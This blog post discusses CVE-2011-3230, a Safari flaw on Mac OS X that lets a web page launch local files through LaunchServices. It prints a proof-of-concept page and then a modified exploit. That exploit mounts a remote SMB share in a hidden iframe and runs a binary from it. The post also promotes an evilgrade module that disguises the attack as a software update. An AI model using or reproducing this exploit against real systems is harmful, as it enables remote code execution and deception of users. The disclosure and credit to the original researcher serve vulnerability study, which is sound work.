On October 12 Aaron Sigel was published an interesting bug (CVE-2011-3230) in the latest version of Safari version < 5.1.1 (Mac OS X only)
Aaron noticed that “It allows you to send any 'file:' url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page.”
The following POC exposes the vulnerability:
<html> <head> <base href="file://"> <script> function DoIt() { alert(document.getElementById("cmdToRun").value); document.location=document.getElementById("cmdToRun").value; } </script> </head> <body> <select id="cmdToRun"> <option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option> <option value="/etc/passwd">Launch /etc/passwd</option> <option value="/Applications/Utilities/Bluetooth File Exchange.app"> Launch Bluetooth File Exchange.app</option> </select> <br /> <input type=button value="Launch" onclick="DoIt()"> <br /> </body> </html> |
As we can see above, you can not give arguments to it and you need to know exactly the path it takes to run.
Additionally LaunchServices checks the "quarantine bit" and thus can not directly execute a binary downloaded from the Internet.
Modifying a little exploit we can execute a binary of our possession:
<html> <head> <base href="file://"> </head> <body> <iframe src="smb://Administrador:X@x.x.x.x/C$" width="0" height="0" scrolling="auto" frameborder="1" transparency> </iframe> <script> function sleep(milliSeconds){ var startTime = new Date().getTime(); // get the current time while (new Date().getTime() < startTime + milliSeconds); // hog cpu } sleep(8000); document.location="/Volumes/C$/infobyte/ls"; </script> </body> </html> |
In this example:
1) We mount an SMB partition, so you can guess the directory /Volumes/[NAMESHARE]
2) Then we sleep for a while until the unit is mounted.
3) Finally run the binary, in this case a simple "ls".
For this attack you can use other protocols such as "FTP / AFP"
The problem is that an alert will pop up asking for user confirmation to execute the binary.
We just added the module safari.pm to evilgrade to take advantage of this vulnerability and make users believe it's an update.
Dowload the last version: https://code.google.com/p/isr-evilgrade/source/list
The funny thing is that there are unknown file types by Mac OS X and these ones without user interaction can be executed by the launch services.
http://www.infobytesec.com/exploit/ISR-safaripoc.html
Imagine for example the combination of this vulnerability with a dangerous file type..
Congratulations for the research to this 'old school' vulnerability Aaron Sigel (@diretraversal).
Reference:
http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html
http://support.apple.com/kb/HT5000
ليست هناك تعليقات:
إرسال تعليق